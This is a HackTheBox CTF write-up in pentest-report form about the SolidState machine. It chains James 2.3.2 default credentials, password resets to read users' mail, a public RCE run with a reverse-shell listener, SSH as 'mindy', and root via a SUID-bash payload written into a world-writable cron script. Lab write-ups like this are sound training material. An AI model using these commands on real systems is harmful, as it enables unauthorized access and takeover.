SolidState CTF Writeup

/ Writeups / By

SolidState CTF Writeup

Writeup presented by Behind Security as part of the Road to OSCP series, focusing on the SolidState CTF from HackTheBox.

SolidState CTF icon

SolidState CTF

SolidState is a medium difficulty machine that requires chaining of multiple attack vectors in order to get a privileged shell.

HackTheBox

Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.

Executive Summary

Introduction

This Pentest report documents the results of the security assessment conducted on the IP address 10.10.10.51. The assessment aimed to identify vulnerabilities within the target infrastructure and evaluate potential security risks.

Objective

The primary objective of this security assessment was to identify vulnerabilities, exploit them, and assess the potential risks to the target system. The evaluation focused on the James Mail Service 2.3.2 and related services.

Requirements

The assessment included:

  • Identifying vulnerabilities within the James Mail Service 2.3.2.
  • Exploiting these vulnerabilities to evaluate potential security risks.
  • Assessing the possibility of unauthorized access and data disclosure.
  • Providing recommendations to mitigate identified vulnerabilities.

High-Level Summary of Found Vulnerabilities

James Mail Service 2.3.2

  1. BS01 - Default Credentials (High): Behind Security successfully logged in to the JAMES Remote Administration Tool 2.3.2 using default credentials (root:root). This access allowed for listing valid users and changing user passwords.

  2. BS02 - Sensitive Information Disclosure (Elevated): By abusing default credentials in the JAMES Remote Administration Tool, Behind Security accessed and read sensitive emails on port 110.

  3. BS03 - Outdated Software and Remote Code Execution (High): The JAMES Remote Administration Tool 2.3.2 was found to have an Authenticated Remote Code Execution (RCE) vulnerability. Exploiting this vulnerability with default credentials resulted in gaining full control of the system.

  4. BS04 - Initial Access - SSH Credentials (High): Sensitive emails revealed SSH credentials for user "mindy," which allowed Behind Security to establish an SSH connection.

Post Exploitation

  1. BS05 - LPE to root (Local Privilege Escalation to root) (Extreme): Behind Security identified an unusual world-writable Python script (/opt/tmp.py) owned by root, which automatically cleared entries in the /tmp folder. By injecting malicious Python code into the script, full root access was obtained.

Recommendations

  1. Change Default Credentials: Immediately change the default credentials (root:root) for the JAMES Remote Administration Tool to strong and unique passwords.
  2. Reset Passwords: Reset the passwords of all affected users and inform them of the changes.
  3. Update Software: Promptly update the JAMES Mail Service to the latest secure version to address known vulnerabilities.
  4. Change SSH Credentials: Change the SSH credentials for user "mindy" and notify the user of the change.
  5. Remove Unnecessary Scripts: Eliminate or disable unnecessary scripts or tools without legitimate use.
  6. Review Permissions: Review and adjust file permissions to restrict write access to sensitive scripts.

Methodology

The assessment encompassed service enumeration, vulnerability identification, exploitation, and post-exploitation activities. Vulnerabilities were identified, exploited, and recommendations provided to enhance security and mitigate risks.

Color Legend

Standard console text
Commands inputted by the pentester
Text that we want to highlight
{...} Abbreviated output for brevity

Risk Classification

Risk Classification from http://www.pentest-standard.org

Independent Challenge - 10.10.10.51

export IP=10.10.10.51

Service Enumeration

IP AddressPorts Open
10.10.10.51TCP: 22, 25, 80, 110, 119, 4555

It is important to note that the port 4555 can only be discovered if you run: nmap -sC -sV -T4 10.10.10.51 -p- -vv

nmap common scan output

James Mail Service 2.3.2

BS01 - Default Credentials

Vulnerability Explanation: Behind Security was able to log in to the JAMES Remote Administration Tool 2.3.2 on port 4555 with default credentials (root:root). With this access, Behind Security listed all valid users and changed users' passwords deliberately.

Vulnerability Fix:

  1. Change Default Credentials: Immediately change JAMES Remote Administration Tool credentials (root:root) to a strong and unique password.

Severity: High

Steps to Reproduce the Attack:

  1. Use telnet 10.10.10.51 4555 to connect, and when prompted for the login ID and password, type root for both.

BS02 - Sensitive Information Disclosure

Vulnerability Explanation: Behind Security changed users' passwords by abusing the default credentials on the JAMES Remote Administration Tool and was able to read sensitive emails from the Solid State Security team on port 110.

Vulnerability Fix:

  1. Change Passwords: Reset the passwords of all affected users and notify them of the change.
  2. Fix BS01.

Severity: Elevated

Steps to Reproduce the Attack:

  1. Use telnet 10.10.10.51 4555 to connect, and when prompted for the login ID and password, type root for both.
  2. Run listusers to see all valid users on the mail system.
  3. Change a user's password using setpassword [username] [password].
  4. Log in to the POP3 instance on port 110 using the new password.
  5. List and read emails by running LIST and then RETR [id].
Changing users passwords
User 'mindy' credentials exposed

BS03 - Outdated Software and Remote Code Execution

Vulnerability Explanation: JAMES Remote Administration Tool 2.3.2 is prone to an Authenticated RCE vulnerability, and public exploits are available. Any remote attacker could exploit this flaw with ease, as it is using default credentials. After the exploit is completed, any user who logs into the machine afterwards (via SSH, for example) can be compromised, and the attacker can run commands on their behalf. Behind Security was able to bypass the shell restrictions placed on the user "mindy" and gain full bash capabilities by receiving a reverse shell connection.

Vulnerability Fix:

  1. Update Software: Immediately update the JAMES Mail Service to the latest secure version to fix known vulnerabilities.

Severity: High

Steps to Reproduce the Attack:

  1. Download this public exploit.
  2. Run it against 10.10.10.51, specifying your tun0 IP address to receive the reverse connection: python3 exploit.py 10.10.10.51 YOUR-TUN0-IP 9001.
  3. Run a netcat listener: nc -lvnp 9001.
  4. Log in to the machine (refer to BS04).

BS04 - Initial Access - SSH Credentials

Vulnerability Explanation: Behind Security was able to read sensitive emails of the user "mindy." One of the emails discloses the credentials for the user to log in via SSH. The credentials were still valid at that point in time, and Behind Security established an SSH connection successfully.

Vulnerability Fix:

  1. Change SSH Credentials: Immediately change the SSH credentials for user "mindy" and notify the user of the change.

Severity: High

Steps to Reproduce the Attack:

  1. Change Mindy's password and read the emails by exploiting BS02 vulnerability above.
  2. Log in via SSH using Mindy's temporary password: ssh [email protected].

Post Exploitation

BS05 - LPE to root

Vulnerability Explanation: Behind Security noted the presence of an unusual Python script located at /opt/tmp.py, which simply clears all entries in the /tmp folder. The script is owned by root but is world-writable, which means that everybody can write to it. Behind Security created a file in /tmp to see if the script was indeed running automatically to clear the folder, and it was. After editing the script to include malicious Python code, Behind Security gained root access to the machine, taking complete control over the environment.

Vulnerability Fix:

  1. Remove Unnecessary Scripts: Remove or disable unnecessary scripts or tools that have no legitimate use.
  2. Permissions: Review and adjust file permissions to restrict write access to the script.

Severity: Extreme

Steps to Reproduce the Attack:

  1. Navigate to /opt: cd /opt.
  2. Use the CAT EOF technique to edit the tmp.py script: cat <<EOF > tmp.py.
  3. Insert any malicious Python code as needed, for example (don't forget to end with EOF to write to the file):
import os
os.system("chmod +s /bin/bash")
EOF
Wait for at least one minute, and then run /bin/bash -p. You can use watch ls -l /bin/bash to monitor /bin/bash permissions in real-time.
Proof of Exploitation: REDACTED user.txt and root.txt

Conclusion

We hope you have found our content on SolidState CTF useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon! 

Behind Security main logo, cropped.

BEHIND SECURITY

Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.

Scroll to Top